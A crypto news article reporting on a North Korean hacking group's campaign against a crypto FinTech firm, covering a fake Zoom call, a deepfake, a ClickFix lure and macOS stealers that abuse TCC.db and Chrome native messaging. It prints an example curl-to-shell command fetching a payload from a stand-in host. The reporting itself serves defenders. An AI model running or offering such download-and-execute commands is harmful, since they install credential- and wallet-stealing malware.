North Korean hackers are getting smarter. They now use AI deepfakes, fake Zoom calls, and fresh malware to target crypto firms and steal digital assets. A recent attack on a FinTech company in the crypto space shows their new tricks. This group, called , dropped seven malware tools on one Mac device to grab credentials, browser data, and session tokens. All this to drain crypto wallets and hit DeFi platforms.
If you work in crypto, blockchain, or Web3, this is a wake-up call. These attacks mix old social tricks with new AI and malware. Learn how they work, what tools they use, and how to stay safe.
is a money-hungry hacking group linked to North Korea. Active since 2018, they shifted focus in 2023 from banks to crypto. They hit startups, developers, exchanges, and VC firms. In 2025, they targeted payments, staking, wallets, and brokerage services.
Crypto is perfect for them. Wallets hold big money with few checks. One stolen session token can empty accounts. This attack used tons of tools on one person’s Mac, showing they want max data for theft and more scams.
The hack started on Telegram. Hackers took over an exec’s account from a crypto firm. They messaged the victim, built trust, then sent a Calendly link for a meeting. It led to a fake Zoom at zoom[.]uswe05[.]us.
In the call, a deepfake video of another CEO appeared. Victim thought it was real. Then, fake audio issues led to a ClickFix trick. Hackers gave “troubleshooting” commands. One hid malware download.
Mac commands looked like this (simplified):
curl -o /tmp/script.sh http://evil-site/payload.sh && chmod +x /tmp/script.sh && /tmp/script.sh Windows had similar ones. Victim ran them, starting the infection.
This mix of compromised chats, fake meetings, AI fakes, and command tricks is new. uses AI like Gemini for research and lures, per threat reports.
Once inside, malware chain exploded. No EDR? No problem. Mac’s XProtect logged behaviors, helping map the attack.
DEEPBREATH is slick. It tricks Finder (with Full Disk Access) to stage TCC.db, injects perms for Desktop/Downloads, restores it. No user prompts. Then grabs all sensitive files.
Poses as docs editor. Sets native messaging at ~/Library/Application Support/Google/Chrome/NativeMessagingHosts/. JSON config for keylog, cookies, caps. Data to subdirs like “c” for Chrome.
Hunt these to spot :
Tools like Google SecOps flag: TCC manip, Chrome native mods, Keychain access.
Crypto pros use Macs, Telegram, Zoom daily. Personal devices link to corp nets. Stolen data fuels more attacks.
Train staff on ClickFix. Use passwordless logins where possible.
These hackers evolve fast. From phishing to AI lures. Expect more Mac tools, cross-OS attacks. Crypto must up defenses: zero-trust, AI detection, fast IR.
Stay alert. One click can cost millions in BTC/ETH. Share IOCs, patch quick, train hard.
Protect your blockchain projects. The future of DeFi depends on it.
Discuss this news on our Telegram Community. Subscribe to us on Google news and do follow us on Twitter @Blockmanity
Did you like the news you just read? Please leave a feedback to help us serve you better
Disclaimer: Blockmanity is a news portal and does not provide any financial advice. Blockmanity's role is to inform the cryptocurrency and blockchain community about what's going on in this space. Please do your own due diligence before making any investment. Blockmanity won't be responsible for any loss of funds.
Why Are Crashing: TAO, ICP, and NEAR Under Pressure The crypto market is facing tough…
Bitcoin's Quantum Threat: Why Could Do More Harm Than Good Quantum computers promise to change…
Introduction: A New Wave of Crypto Threats Cryptocurrency and DeFi sectors are under fire. North…
signals banks are ready. It's not hype. It's real infrastructure for a blockchain future. As…
The crypto market is in a rough spot right now. Prices are dropping fast across…
Recent files from the US Department of Justice have pulled back the curtain on .…